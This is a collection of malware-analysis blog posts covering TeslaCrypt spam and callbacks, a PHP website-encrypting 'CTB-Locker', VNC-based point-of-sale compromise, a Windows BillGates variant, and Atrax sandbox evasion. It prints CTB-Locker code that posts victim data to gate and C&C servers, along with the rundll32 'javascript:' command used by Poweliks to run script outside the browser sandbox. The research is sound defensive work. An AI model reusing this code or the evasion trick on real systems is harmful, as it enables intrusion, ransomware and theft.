Jscode.php is the script in charge of the JavaScript obfuscation.
It takes the clean JavaScript code as input. In this case, it is a JavaScript script in charge of downloading 3 binaries, copying them in the %TEMP% directory and executing them, a classic schema of these last months. This JavaScript script is obfuscated through random string generation.
After obfuscation, let’s go back into send.php. The script crafts random emails based on information found in all the txt files (sender email, subject, message, etc.).
For example:

  • The email template:


  • The subject template:


  • A list of fake name:


  • A list of fake source email addresses:

To send spam, the script is not using compromised SMTP server as TeslaCrypt does ( This time, the script uses a list of compromised websites on which an attacker have uploaded a malicious PHP script. The kit contains a list of 14179 compromised hosts (the huge majority are WordPress websites).
The malicious script used to send mail (via the mail() PHP function) is available at :
Finally, online, this spamming kit looks like:
In sendmail.rar we can also find a standalone PHP script, update.php, used to automatically deploy the spamming kit.
We now have all the information needed to follow with attention this campaign with free tools like (looking for ‘ .zip’ recently submitted files):


Yet another malware campaign with malicious JavaScript and compromised CMS.
Abandoned WordPress sites is a real security problem. Administrators leave online old WordPress web sites during several years. If we look at the number of vulnerabilities in WordPress plugins, it becomes very easy to create a list of several thousands of compromised WordPress sites. In each recent malware campaign, old WordPress sites were involved (Locky, Dridex, TeslaCrypt and now Gamarue…).
I’m really fed up with this situation but there is no real solution.
As a reminder, to protect the endpoint, you can change the default program to execute ‘.js’ files to execute notepad.exe instead of wscript.exe. This prevents the script from being erroneously executed by a user.
Some points in conclusion:

  • JavaScript file is NEVER (NE-VER) USED as a format for an invoice (NEVER, REALLY!)!
  • If you are a website administrator, DO NOT LEAVE OLD WORPRESS SITES ON THE INTERNET.
  • And, if you are a crook, allowing directory listing in your web server is a really a good idea for investigation.

I would like to thank @F_kZ_ @dvk01uk @JAMESWT_MHT @Techhelplistcom @MalwareTechBlog @malwrhunterteam and @malwaremustdie for their help during this investigation.

Let’s ride with TeslaCrypt

As you can see, we have been working on ransomware over the past few days. This time, we are talking about TeslaCrypt.
TeslaCrypt is a ransomware spread by e-mails or exploit kits. It encrypts your files and asks you to pay in order to retrieve the decryption key. The current version is 3.0. Many analysis are already available on the Internet.
In this article we are focusing on two aspects of TeslaCrypt:
– The attack vector
– The web callback

Attack Vector – Bombila

Early in February 2016, Xylitol added an unknown panel on cybercrime-tracker.
After some research, we have found a binary file hosted on the server at the following address: hxxp://
This binary file is a bot which sends spam. It uses a list of compromised SMTP servers contained in the file hxxp://
This file (781 MB) contains around 4000 compromised SMTP accounts (Orange, SFR, Telefonica, Yahoo, Gmail, etc.).
After that, the binary file retrieves a list of e-mails from hxxp://*****.txt.
Directory listing was enabled on this directory, so we could find 139 text files for 792 256 e-mails.
The spam bot also retrieves some texts for crafted e-mails via several files in hXXp:// For example, some fake names: and random text like:
Finally, the bot retrieves malicious attachments from the directory hXXp://*****.zip. 200 zip files are waiting in this directory.
These Zip files contain malicious JavaScript droppers, each one dropping the TeslaCrypt ransomware.
Everyone has seen this type of attachment for the last few months in their mailbox.
Here is an example of these malicious droppers:
This JS drops Malicious (TeslaCrypt) binary file from:
These servers are known for spreading the TeslaCrypt ransomware:
When spamming, the binary file writes a lot of logs on the infected machine, such as:
And now let’s go to the funny part. After some guessing, we found an archive at hxxp:// This zip file (size: 468 MB compressed, 2 GB decompressed) is a full backup of the server. It contains all the files of this spamming server: source code, logs, payloads, etc. 5
For example, the source code of the spammer bot callback: or index.php:
This archive contains also 45 millions of e-mails in different text files.
This overview allows us to have a better understanding of how TeslaCrypt ransomware is spread. We can suppose that crooks carrying spam campaigns are different than the ones which manage the ransomware.
I would like to thank the CERT Orange for their work and MalwareMustDie for their support.

TeslaCrypt – Web callback

Now, let’s talk about a not really documented part of the ransomware: the callback web.
When a machine is infected by TeslaCrypt, the malware sends some data to a web callback on a compromised server. For example:
(thanks to @techhelplist )
This callback is just a gateway to the real C&C hosted in TOR.
The source code of such a callback is available at:
Firstly, the page kicks IP from Microsoft:
After that, the callback creates a file most.txt and logs all data received from infected machines in this file.
This file looks like:
These data are also sent to three TOR callbacks:

In the TeslaCrypt web kit, we can see another file named « cron.php » (source code available at: )
The code compares three variables $_REQUEST[‘password’], $_REQUEST[‘re_password’] and $_REQUEST[login’]. The aim of this code is still unclear.
This information is perfect to follow the infection rate of TeslaCrypt. After grabbing most.txt file from different callback, we were able to do some statistics on a little part of this campaign:
– We retrieved 30 210 data raw:
– 15 290 unique IP addresses (due to NAT, one IP address can return several infected machine)
– 40 TOR exit node : )
We can see that the most affected countries are Republic of Korea and Turkey. The whole statistics are available at


We looked at another face of the TeslaCrypt infection: the attack vector and the web part. Both were interesting to analyse.
These data are always interesting for estimating the infection rate of a campaign. The logged files show us that the infection rate is quite high, ransomware is definitely a lucrative business.
The web part of ransomware is often forgotten; with different articles we will try to better understand the whole picture.


A lockpicking exercise

A malware calling itself « CTB-locker » is spreading over some websites since the 12th of February 2016. This campaign is different to classical ransomware attacks that focus only on workstations, at first sight, CTB-locker seems also to focus on websites in order to encrypt all files located in the server.
I found this campaign by accident. During an investigation, I retrieved a malicious binary file from hXXp:// In order to understand the context, I visited the homepage of this server and landed to this rather scary page:
The ‘Decrypt’ button browses to a page offering to decrypt two of the lost files for free:
If the website administrator worries, a chat with the crooks is even possible!
I was not aware that CTB-Locker was also attacking websites?! It was time for further investigation.
With the help of some search engines, I was able to found a lot of websites with the same homepage:
It seems that an attack was ongoing. To help, you can find a list of these websites on Pastebin:
Quickly I was able to found 102 websites infected by this « CTB-Locker ».
Javascipt explains something interesting in their homepage (index.php):

admins = ["", "", ""];
iadmin = 0;
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);
function post_admin(postdata, onsuccess) {
$.post(admins[iadmin], postdata+"domain="+domain, function (data) {

$(‘#decrypt’).click(function() {
post_admin(“decrypt=”, function(data) {

$('#dectest').click(function() {
post_admin("dectest=secret="+($("#secret").val()), function(data) {

$('#sendmsg').click(function() {
msg = "msg=" + encodeURIComponent($("#chatmsg").val());
post_admin("sendmsg=secret="+$("#secret").val()+msg, function(data) {

$('#recvmsg').click(function() {
post_admin("recvmsg=secret="+$("#secret").val(), function(data) {

As we can see, POST requests are sent to other second-level servers, that we will call “gates”, in order to decrypt the files:
admins = ["", "", ""];

I compiled a list of gate servers from the infected websites on Pastebin as well:
Even if it is not confirmed, we can suppose that this ransomware works in this way:
So, it’s time for my favorite game: finding a sample.
The original victim server,, seems to be a good starting point: this server should be full of vulnerabilities because it hosts malware like CTB-Locker ransomware.
After some research, I found an unprotected webshell already running on the server:
Thanks to this webshell, it is really easy to grab the files related to CTB-Locker. And now I’m sure: this ransomware uses only PHP scripts.
First, let’s have a look at the root index.php file (available at ).
This ransomware is composed of several files:
A directory named « Crypt » containing a bunch of self-explanatory PHP scripts:
– AES.php
– Base.php
– BigInteger.php
– Hash.php
– Random.php
– Rijndael.php
Along with the index.php main page, other files are relevant to this ransomware: allenc.txt, test.txt, victims.txt, extensions.txt, temp, robots.txt and secret_XXXXX.txt.

The encryption process starts when a malicious user generates a specially-crafted POST request to the index.php page:
encrypt_files($victims, $_POST['submit'], $_POST['submit2']);.
Function enc_excluded in index.php is used to exclude the previously core ransomware files (just to be sure the malware will not encrypt itself!).
The list of files to encrypt is computed in the function get_files. Directories are recursively crawled and the list of files to encrypt (in AES-256) is written in the file named victims.txt.
The files are chosen based on their extension. The list of extensions to keep is contained in the file extensions.txt:
This list of files is then sent to the function encrypt_files. This function selects two files in this list and writes them to test.txt.
These two files are encrypted by a first key (“submit” variable in the POST request) and can be decrypted for free using the feature “We give you the opportunity to decipher 2 files free!”.
The other files are encrypted with another key (“submit2” variable in the POST request) and this list is written in the file allenc.txt.
In order to uniquely identify the infected server, the ransomware uses a unique secret computed as characters 2 to 10 of the MD5 hash of the strings : “djf33”+the hostname (ex: md5(djf33www.

$secret = substr(md5("djf33".cur_domain), 2, 10);

When the user clicks on the button « Decrypt », a request is sent to the gate servers:

admins = ["", "", ""]; via la variable decrypt=

If the user has correctly paid, a popup appears with the contents:
« Your decryption key is XXXXXX » and index.php is reloaded with the correct POST parameters:

window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];

Loading this page with these parameters decrypts the files.
Servers hosting the access.php page are in fact compromised servers. So, if I want to reach the C&C server, I need to have a look at the code of access.php .
I managed to get a hand on an access.php file whose content is available at
The C&C address is hard-coded in this page:
$result = socket_connect($sock, "", 9338);
A socket is opened and waits for some commands such as:
– “Vic” for decrypting
– “Snd” / “Rcv” for chat feature

I don’t have the code yet behind the socket on, but even if I found it, I’ll not release it on the Internet :).

The last question to answer is how the victim websites were infected. I don’t have a clear answer to this question, here are just some elements describing these servers.
Based on the fact that a lot of victims do not have a dynamic website or a CMS, it is difficult to say if the malware uses a well-known vulnerability.
The infected hosts run both Linux and Windows and the majority of them (73%) host an Exim service (SMTP server).
Most of them run a password-protected webshell accessible through the “logout.php” dynamic page.
Some of them are vulnerable to shellshock, but without a deep access on victims’ servers, it is difficult to understand how this ransomware infected hosts.

Like every week for six months, a new ransomware family popped up. This time, servers are targeted and use simple PHP technology to perform their malicious activities.

I would like to thanks nl3dee who helped me retrieving the source code of access.php.
All the source code is available at

Low-cost point of sales (PoS) hacking

Hacking point of sales (PoS) systems is a very trendy topic. A lot of PoS malware can be found in the wild (jackPOS, gamaPOS, Backoff, FighterPOS…). At every big breach of PoS systems, media talk about sophisticated attacks involving high skills and great tools. But sometimes, it can be very easy to compromise a PoS and no particular skills are required to steal sensitive information, such as credit card numbers.
During our investigation, we caught a very interesting case of “low-cost” PoS hacking. This article tries to unveil the inner process of infection.

Everything started with a Win32.Ardamax sample found in the wild. Ardamax is a classical sample which is a commercial keylogger available on the Internet.
After reversing this sample, it appears that the malware uploads data on a FTP server hosted in Germany, on server4you. This FTP can easily be accessed (login and password are embedded in the sample) and contains victims’ uploaded data.
This FTP seems to be used since the 9th of October 2014. The server is full of samples, tools and exfiltrated data.
We cannot publish the original sample, because Server4you has not shutdown the server yet.
Exfiltration server
This repository contains the original Win32.Ardamax sample, malwares (Darkomet, Andromeda, Gorynych…), some memory scrappers to retrieve credit card numbers and websites crawlers scan results.
On the same repository, we can find screenshots, microphone recordings, webcam pictures as well as keystroke recordings for each single infected computer.
Keylog result
Crooks have access to about fifteen point of sales computers as well as to some SCADA systems.

Belgium SCADA
Belgium SCADA
Cinema PoS
Cinema PoS
Brazilian gas pump
Brazilian gas pump

We spent a lot of time contacting CERTs and companies for cleaning computers but day after day new infected point of sales data were uploaded to the FTP repository.
How were crooks able to continuously find new targets to infect?
Amongst uploaded data, some screenshots caught our attention: somebody was using a VNC brute force tool against a large range of IP addresses.

The tool used by crooks can be retrieved from an archive uploaded to the VirusTotal website:
It seems they are using infected computers to brute force VNC servers with weak passwords . When a new VNC connection is established, a new payload is downloaded through a regular browser and installed on the newly infected machine. No exploit or sophisticated techniques are employed.

Gorynych installation
Gorynych installation

Once the payload is downloaded, any installed antivirus is configured to ignore it or is even completely uninstalled. This requires administration rights on the computer, but obviously this is quite a common situation on point of sales systems.

This day, it is Gorynych which was spreading:
Last but not least, crooks used compromised computers to administrate the Gorynych panel:

During several days we followed the whole stealing process. Crooks infected point of sales and used mainstream memory scrappers like SearchforCC for credit card numbers exfiltration.
As we can see, there is no need of sophisticated attacks or processes to infect systems. With a little more time, crooks would be able to infect a much larger range of systems. With a short list of 152 weak passwords, an attacker is able to control a lot of point of sales systems. In this case, crooks access from small and medium-sized enterprises to companies with 500 million dollars in annual sales.
This kind of campaign would not be so easy to carry out if:
• Point of sales computers were not directly connected to the Internet;
• Strong VNC passwords were used;
• Administrator accounts were not used to connect to sensitive systems.
This kind of negligence can result in a huge waste of money and a very bad image for the compromised company.


Payload found on the FTP site

1edc2a1c19a6deb330f21eb0f70d6161 a.exe
6b5ea21045e2c689f6f00e6979955e29 al.exe
4645b7883d5c8fee6579cc79dee5f683 ares.exe
9d87838b7de92cfa5675a34f11d3e7e1 b1.exe
af13c28f32b47423bfebb98de3a7d193 b2.exe
bf395a47eac637f0b2b765ba91d914c7 b3.exe
af36ed9267379f86fc12cc0cfc43938e bm.exe
57138e9fd20b9b93129ed599062bd379 cn.exe
f8058abb53ae90512b3da787bb25a21e dx.exe
0762764e298c369a2de8afaec5174ed9 fgdump.exe
9e76d363a7f93a2ef22483ce1866e8ee gt.exe
413ba3a4705504e528ce05c095cbc8a5 loader.exe
abd788f868ff4a96b91846dd46c9e701 mircpsy.exe
255daa6722de6ad03545070dfbef3330 mmon.exe
cc074e5542c0daca3d9b261dc642bfaa n.exe
85e5727d23ab417a1d05ce656de358b6 new(1)text.exe
79c8661bd5e69df5bb94032a356adc33 nyf1.exe
f461873a10a4b49197a822db88b707fa PowerGrep4.exe
467dc270f0d0619dbd1dfcc554da5f8b private.exe
10c7cdc821291921a957b94b101524af prv.exe
619e2172359cfff98f3124bdd4d9eeb5 q.exe
7c44933863109c101a52c04544626b7f r.exe
780fe52363ec0745da43fc6776f0be8c Spark.exe
af5aac5ef503c929db12d8e031788321 spy.exe.exe
2976768953979e045c1b5773de29e230 sweet.exe
5f6158cbfc5b2f80ad2ebcbeebfd1562 t2s.exe
30a9088df5a7586ca418cb1600ac8683 x64.exe
ef295b49ac6d6e6a4a43b5af75584830 zip.exe

Related servers

When ELF.BillGates met Windows

If you are used to play with honeypots, you have inevitably met the ELF.BillGates malware. It is a known[1] botnet spread over Internet for 4 years.

In a nutshell, ELF.BillGates is a (Chinese) DDOS botnet with backdooring features. It is a binary file with many behaviors depending on the installation path[2]:

  • Gate 0: Infection Monitor (dropper + persistence)
  • Gate 1: Host (Contact C&C + DDOS features)
  • Gate 2: Backdooring
  • Gate 3: Utility spoofing

The “Elf.BillGates” version targets Linux operating system. We have followed the activities of this botnet for several months and during our investigations we found some versions of a Windows fork of the malware. This article attempts to detail this variant.

The primary infection vector is the exploit of the vulnerability CVE-2014-6332[3], which drops the binary file hosted on an HTTPd File Server (HFS)[4]. This vulnerability allows an attacker to escape the Internet Explorer sandbox with a VBScript script and execute an arbitrary binary file downloaded from the Internet.



Figure 1 – Example of compromised HFS server

First and foremost, we noticed that this malware seems to be currently in development. The author seems to make tests in the wild, and several samples are unstable.

In a few weeks, we collected about thirty samples, and we identified 2 different versions of the malware:

    • A version almost working on Windows XP but unstable on more recent operating systems.
    • A very unstable version based on Safeengine protector (a packer against reverse engineering)[5].

Both versions reference the same symbol path:

重构 can be translated by builder.

This article analyzes a sample of the first family named 36000.exe (sha1: 4b14d7aca890642c3e269b75953e65cb)

GatesInstall – Gate 0 – Infection monitor

PDB: F:\\Updates\\重构\\GatesInstall\\Release\\GatesInstall.pdb

This is the installation part of the malware, that will drop the different files in the system, and create persistence.

This sample in not obfuscated, but we have met some UPX packed samples.

This binary file embeds seven executable resources.


Figure 2 – PEStudio view of the binary


As we can infer from the PDB path, this binary file is the installer of Win32.BillGates malware.

On its first execution, it checks if the system is not already infected by trying to kill BillGates instance with the system tool taskkill.exe :
Taskkill /F /IM DbSecuritySpt.exe
Taskkill /F /IM Bil.exe
Taskkill /F /IM svch0st.exe
Taskkill /F /IM DNSClient.exe
Taskkill /F /IM DNSProtection.exe

/F is for killing process, /IM is the image name.

After this check, the malware checks the OS version with GetOsVersionExA and fills a global variable with the following value. It is supposed to support all versions of Windows:

Windows Server 2008 R2
Windows Server 2008
Windows 7
Windows Vista
Windows Server 2003
Windows XP
Windows 2000
Windows NT
Windows 32s
Windows Unknown

After that, it checks if it runs on a 32 or a 64-bit OS with the help of the GetSystemWow64DirectoryA API.

Happy to play with an old Windows installation, I tried to launch the installer on Windows 2000 but I was disappointed: GetSystemWow64DirectoryA is only available starting from Windows XP, so the process does not start due to this unresolved reference:


Figure 3- Error: Unable to find entry point of GetSystemWow64DirectoryA Proc on kernel32.dll

The detection of OS older than Windows XP is then pretty useless.

After that check, the malware installation depends on the version of the OS.

On Windows 2003 / XP, the following files are created:

C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe (resource 107 or 108)
C:\Program Files\DbSecuritySpt\svch0st.exe (resource 104)
C:\Program Files\Windows Media Player\agony.exe ( resource 103)
C:\Program Files\Windows Media Player\agony.sys (resource 102)
C:\Program Files\Windows Media Player\DNSProtection.exe (resource 107 or 108)
C:\Program Files\Windows Media Player\DNSSupport.exe (resource 107 or 108)

On Windows 2008 Server, two additional files are created:

C:\Program Files\DbSecuritySpt\NPF.sys (resource 105)
C:\Program Files\DbSecuritySpt\packet.dll (resource 106)

DbSecuritySpt.exe, DNSSupport.exe and DNSProtection.exe have the same contents. On the 32-bit edition of the OS, resource 107 is used whereas resource 108 is used on the 64-bit variant of the OS.

After several tests, Win32.Billgates is only able to start on Windows XP. On newer versions of Windows, the installer simply crashes. This crash seems to be related to ASLR. In fact, when the code attempts to retrieve the security cookie in functions handling buffers, it references a hard-coded address as if the binary file was loaded at a fixed address. This generates an access violation.

afterviolation1 afterviolation2

The rest of this article details the analysis of the malware on Windows XP.

Once the binary files are written to disk, GateInstall launches DbSecuritySpt.exe and DNSSupport.exe as services. Creating services requires administrator privileges. In most cases, attackers gain administrator privileges by brute forcing administrator RDP account on Windows Server 2003 computers.

That’s all for the installer.


GateInstall writes the same binary file in 3 locations:

C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe (resources 107 or 108)
C:\Program Files\Windows Media Player\DNSProtection.exe (resources 107 or 108)
C:\Program Files\Windows Media Player\DNSSupport.exe (resources 107 or 108)

PDB: F:\\Updates\\重构\\GatesInstall\\Release\\Gates.pdb

Gates starts by an identification routine:

      • Decryption of its configuration
      • Check of the file path and if it is launched as a service.

The configuration is encrypted with a hard-coded RSA 1024 key:


Once decrypted, the configuration data is organized in the same way as the ELF version[6]:


In the Windows version, Prime C, D and modulus N offset are hard-coded, meaningless and not used.

In this sample we noticed an empty campaign name, but other analyzed samples were linked? to a named campaign:

The Windows binary file also contains some clear strings that allow us to say it is a variant of the ELF version:


DbSecuritySpt – Gate 1 – Host

Launched as a service, DbSecuritySpt is the main persistent binary file that is run. To get into DbSecuritySpt behavior, the binary file must be launched as a service from C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe.

DbSecuritySpt launches several threads in charge of fingerprinting the computer, communicating with the C&C infrastructure and performing DDos actions.

The following data is sent to the C&C:

DbSecuritySpt – Gate 1 – Host


This service is also in charge of taking part of DDoS campaigns.

DbSecuritySpt is supposed to support several DDoS types: ICMP, SYN UPD and DNS amplification.

The binary file contains a list of 230 hardcoded IP addresses that correspond to DNS servers used for DNS amplification attacks[7].


We tested these DNS servers. Only 58 IP addresses seem to be still vulnerable. The other servers were either patched or unreachable.

svch0st – Gate 2 – Backdoor

PDB: E:\SVN\trunk\2014\小陈\重构\IECtrl\Release\IECtrl.pdb

小陈 can be translated as Chen and重构 as builder.

At last, GateInstall drops the binary file C:\Program Files\DbSecuritySpt\svch0st.exe.

The original name of this file is IECtrl.exe. IECtrl is an independent tool also used by other malwares (such as Win32:Wapomi-B )

It implements the backdoor functionalities of Win32.BillGates. This tool is identified by Microsoft as « Trojan:Win32/WebToos.B ».

DbSecuritySpt.exe passes a list of C&C server URLs as a parameter to IECtrl. IECtrl contains the logic to download, extract and execute payload from these URLs.

DNSSupport – Gate 3 – Spoofing utility

DNSSupport must be run as a service from the location C:\Program Files\Windows Media Player\DNSSupport.exe. Its behavior is simple: it is in charge of launching DNSProtection.exe and leaves the process in an infinite loop preventing the service from being stopped.

Spoofing utility


DNSProtection is a “spoofing utility” Gate. It is not functional in the analyzed sample. However, static analysis of the binary file allows drawing some conclusions about its internal behavior.

DNSProtection is used for hiding infection traces. It uses the rootkit Agony. Agony is composed of an executable (agony.exe) that loads and runs a driver (agony.sys). This rootkit was released in the wild some years ago. It is used for hiding files, services and network connections. This malware uses DNSProtection for hiding all dropped files (DNSSupport.exe, DNSProtection.exe, DbSecuritySpt.exe, agony.sys, agony.exe and svch0st.exe) and the connections to the C&C servers.


Agony.sys cannot be loaded on a 64-bit version of the operating system as it is not signed.


Win32.BillGates developers seem not to be used to develop malwares for the Windows operating system. They use poor techniques that can easily be detected by anti-virus software, and the limitations in terms of operating system compatibility could be easily avoided. This Windows port should not be a big threat as the ELF version is.

ELF structure compared with Windows version:

      • GateInstall : Gate 0
      • DbSecuritySpt : Gate 1
      • Svch0st : Gate 2
      • DNSSupport / DNSProtection : Gate 3


During our analysis, we noticed some samples with strange behaviors (hooking, binary file infection, IRC connections …). After further analysis it appears that some samples were infected by Win32.Virut and Win32.parite viruses. Virut and Parite are viruses that infect ‘.exe’ and ‘.scr’ Windows binary files on disk. It is possible that the crooks using BillGates malware are working on infected systems.

This may also explain why a lot of Win32.Parite cleaning tools were discovered on several malicious working BillGates C&C servers we visited. J

Here is a screenshot of such a tool:


About 30% of analyzed samples were infected by Win32.Parite and 20% by win32.Virut.



Some Win32.BillGates hashes:


Win32.BillGates infected by Win32.Virut:


Win32.BillGates infected by Win32.Parite:



      • Created files :
        • C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe
        • C:\Program Files\DbSecuritySpt\svch0st.exe
        • C:\Program Files\Windows Media Player\agony.exe
        • C:\Program Files\Windows Media Player\agony.sys
        • C:\Program Files\Windows Media Player\DNSProtection.exe
        • C:\Program Files\Windows Media Player\DNSSupport.exe
        • C:\Program Files\DbSecuritySpt\NPF.sys
        • C:\Program Files\DbSecuritySpt\packet.dll
      • Created services:
        • DbSecuritySpt
        • DNSSupport
      • Running processes:
        • DbSecuritySpt
        • DNSSupport
        • DNSProtection
        • exe








Related works:

MalwareMustDie :



Poweliks – Command Line Confusion

Recently, hFireF0X provided a detailed walkthrough on the reverse engineering forum about Win32/Poweliks malware. The particularity of this malware is that it resides in the Windows registry and uses rundll32.exe to execute JavaScript code.

I found it funny that we can execute some JavaScript through Rundll32 and obviously I was not the only one.

Capture d’écran 2014-08-20 à 15.57.26

When we first saw the command line executing JavaScript, we were wondering how it worked.

In this blog post, we analyze how and why JavaScript is executed when calling this simple command line:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert(‘foo’);

Reminder about Rundll32

Rundll32 usage is documented on MSDN; it is used to call an exported function of a DLL file which can be achieved with the following command line:

RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>

entrypoint is the exported function; its prototype must be:

void CALLBACK EntryPoint(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow);

The lpszCmdLine parameter is given the <optional arguments> value specified on the rundll32 command line.

We will try to figure out how Rundll32 is able to call the function RunHTMLApplication exported by the library mshtml.dll and how the “javascript:” prefix is used to execute actual JavaScript code.

Analysis of Rundll32


One of the first things done by Rundll32 is to parse the command line in the internal function ParseCommand. This function searches for a comma (‘,’, 0x2C) to locate the DLL name and for a space (‘ ‘, 0x20) to locate the entrypoint name.

Capture d’écran 2014-08-20 à 16.00.23

When using our sample command line, ParseCommand returns javascript:"\..\mshtml as the DLL name and RunHTMLApplication as the entrypoint. In this context, the space after RunHTMLApplication delimits the ‘optional arguments’ part of the rundll32 command line:

Capture d’écran 2014-08-20 à 16.01.37

Dll loader

Rundll32 will perform several tries to load the actual DLL from the initial specification javascript:"\..\mshtml.

The first test uses the function GetFileAttributes(“javascript:”\..\mshtml”). This function eventually accesses C:\Windows\system32\mshtml. As this file is not found, the function returns -1.

Capture d’écran 2014-08-20 à 16.04.07

SearchPath is then invoked to resolve the DLL name. This function reads the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeProcessSearchMode. The Microsoft definition of this key is:

When the value of this REG_DWORD registry value is set to 1, SearchPath first searches the folders that are specified in the system path, and then searches the current working folder. When the value of this registry value is set to 0, the computer first searches the current working folder, and then searches the folders that are specified in the system path. The system default value for this registry key is 0.

By default this registry key doesn’t exist (on Windows XP / 7 / 8) so SearchPath tries to load the file mshtml in the current directory of rundll32 (c:\windows\system32) prior to trying locating it in the system path.

Capture d’écran 2014-08-20 à 16.05.45

All these attempts fail and rundll32 moves to the next step. GetFileAttributes is called again searching for the manifest for the module: javascript:”\..\mshtml.manifest

Capture d’écran 2014-08-20 à 16.07.09 Since all the previous steps failed, Rundll32 eventually calls LoadLibrary("javascript:"\..\mshtml").

LoadLibrary is just a thin wrapper around LdrLoadDll located in ntdll.dll. Internally, LdrLoadDll adds the default extension .dll and parses the resulting string javascript:”\..\mshtml.dll as a path. The token .. instructs to go one folder up: it resolves to mshtml.dll (think of foo\..\mshtml.dll resolved as mshtml.dll).

With mshtml.dll specification, LdrLoadDll is able to load the library in the system directory.

Capture d’écran 2014-08-20 à 16.09.02 Rundll32 then calls GetProcAddress with the previously extracted entry point name RunHTMLApplication.

For the moment, the javascript: prefix seems pretty useless: LoadLibrary("foobar:\"\..\mshtml") works fine. So, why prefixing with javascript:?

Protocols Handler

Once the entry point address has been resolved, Rundll32 calls the function mshtml.dll!RunHTMLApplication.

Even if not documented, the actual RunHTMLApplication can be inferred from the call made by c:\windows\system32\mshta.exe (the application dedicated to launch an .hta file):

HRESULT RunHTMLApplication(
LPSTR szCmdLine,
int nCmdShow

This is not far from the function prototype expected for a rundll32 entry point:

void CALLBACK EntryPoint(
HWND hwnd,
LPSTR lpszCmdLine,
int nCmdShow

RunHTMLApplication receives a handle to a window instead of a handle to a module as the first parameter. This parameter is used when mshml registers for a window class and creates a window of this new class. Passing a value not corresponding to an actual instance doesn’t seem to disturb user32 very much…

The second parameter is not used at all, so the mismatch is not important.

The last parameter, nCmdShow, is used by the RunHTMLApplication function to display the window hosting the HTML application. Rundll32 always calls the entry point function with the value SW_SHOWDEFAULT to instruct any potential opened window to use window default placement.

The main parameter of interest would be lpszCmdLine (";alert('foo')) in our case.

Capture d’écran 2014-08-20 à 16.16.36

This obviously leads to an issue since this is not a valid JavaScript statement (please note the missing double-quote at the end of the statement). But it works anyway, because RunHTMLApplication ignores the given parameter and prefers to request again the original command line from the GetCommandLine Windows API (wrapped in a call to the GetCmdLine function).

Capture d’écran 2014-08-20 à 16.20.09

The full command line contains the name of the executable and the parameters: GetCmdLine extracts the parameters by cleaning up the executable specification:

Capture d’écran 2014-08-20 à 16.23.29

After that, RunHTMLApplication calls CreateUrlMoniker:

Capture d’écran 2014-08-20 à 16.25.04

This is where the string « javascript: » is essential.

CreateUrlMoniker parses the command line to extract the string before the char “:” (0x3A): “javascript”.
Capture d’écran 2014-08-20 à 16.28.27

CreateUrlMoniker crawls the registry key HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\. These keys refer to a set of protocols and their CLSID.

CreateUrlMoniker finds an appropriate protocol handler for the JavaScript protocol (HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\javascript):

Capture d’écran 2014-08-20 à 16.29.55

The CLSID {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} matches « Microsoft HTML Javascript Pluggable Protocol ».

Capture d’écran 2014-08-20 à 16.31.51

It is for this reason that the string “javascript” is essential in the beginning of the parameters.

The same mechanism comes into play when one types javascript:alert(‘foo’); in the Internet Explorer navigation bar:

Capture d’écran 2014-08-20 à 16.34.18

The remaining of the string located after the ‘:’ separator is interpreted by the JavaScript URL moniker as JavaScript instructions:

"\..\mshtml,RunHTMLApplication ";alert(‘foo’);

This is a valid JavaScript with a string "\..\mshtml,RunHTMLApplication " (hence the double-quotes skipped in all the previous steps!) and a function (alert).

Finally RunHTMLApplication calls CHTMLApp::Run and the JavaScript is executed:

Capture d’écran 2014-08-20 à 16.35.36

Security point

From a security point of view, executing JavaScript through Rundll32 is like executing an HTML Application.

In other words, we can have all the power of Internet Explorer—its object model, performance, rendering power and protocol support—without enforcing the strict security model and user interface of the browser. Zone security is off, and cross-domain script access is allowed, we have read/write access to the files and system registry on the client machine.

With this trick, JavaScript is executed outside the Internet Explorer process and script is not subject to security concept like Protected Mode / Sandbox on Vista and superior.


RunHTMLApplication has the perfect prototype to work with Rundll32. Attackers have made great efforts to build a command line using the perfect syntax for passing through all the mechanisms (library loading, command line parsing, URL syntax correctness, valid JavaScript, etc.) leading to JavaScript execution in an uncontrolled environment.

From our understanding, this technique allows bypassing some security products that may trust actions performed by the built-in rundll32 while specifying the script to run without writing any file on the file system.

That’s all folks!


Atrax is a malware discovered during the summer of 2013. It includes some basic features like distributed denial-of-service, keylogging, the ability to steal banking credentials, to send spam or to install a Bitcoin miner for crafting bitcoin money. The particularity of Atrax is that it communicates with command and control server over TOR, which is a protocol that enables online anonymity. An ESET blog post has been made to give more information about this tor based botnet:

Atrax’s specification highlight us about anti-analyzer technics:

- Anti-Analyzer (Protection against e.g.,
- If you need: Anti-VM (Please request it explicitly)
- Anti-Debug/Anti-Hook Engine

The sample we studied was seen in the wild in April 2014 and submitted to the VirusTotal web site (

We choose to analyze the Atrax botnet in the process of our permanent security monitoring, in order to be sure that our best of breed HIPS engine is able to block new technics used by hackers. This article is not a full analysis of the malware, it chooses to focus on the capabilities to do not be detected or analyzed.

Sandbox detection

We started by looking at the anti-sandbox capability. To obtain a fast dynamic analysis of a potential malware, many online services provide sandbox capabilities to give you a deeper look of what the application is doing on the operating system: the principle is to start the malware execution in a virtual machine to trace its behavior. At the end of the timeout the service provides a report and sets the virtual machine to its initial state for the next analysis. In this way, we can quickly know if a binary file is malicious or not. Malwares now try to detect this kind of sandbox to be sure that people couldn’t analyze the behavior of the malware or that security solution couldn’t block it proactively.

To test the protection mechanism of Atrax, the sample was submitted to multiple online sandboxes:

  • Anubis when executing, the binary file crashes (STATUS_ACCESS_VIOLATION) preventing behavioral analysis. It is a normal behavior of Atrax when it detects online sandbox. The virtual machine was not infected.
  • Malwr the binary file runs normally, the virtual machine was infected.
  • JoeBox (CWSandbox / File-analyzer) The binary file runs normally, the virtual machine was infected.
  • Comodo the binary file runs normally, the virtual machine was infected.

